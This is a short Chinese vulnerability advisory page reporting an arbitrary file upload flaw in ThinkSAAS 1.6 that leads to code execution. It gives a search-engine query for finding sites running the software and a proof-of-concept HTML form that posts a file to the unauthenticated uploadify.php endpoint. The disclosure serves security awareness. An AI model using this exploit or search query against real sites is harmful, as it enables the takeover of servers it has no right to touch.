- 赞助商
- 推荐文章
- 热门信息
- 广告赞助
ThinkSAAS任意文件上传漏洞
时间:2012-02-14 00:00 来源:未知 作者:中国计算机网 点击:
次
|
漏洞作者: insight-labs
提交时间: 2012-02-12
漏洞类型: 文件上传导致任意代码执行
google:Powered by ThinkSAAS 1.6 漏洞证明:
<html> <form action="http://xxx/public/js/uploadify/uploadify.php" method="post" enctype="multipart/form-data"> <input name="Filedata" type="file" /> <input name="sub" type="submit" value="upload" /> </form> </body> </html> |
- 评论区
正在载入评论数据中...



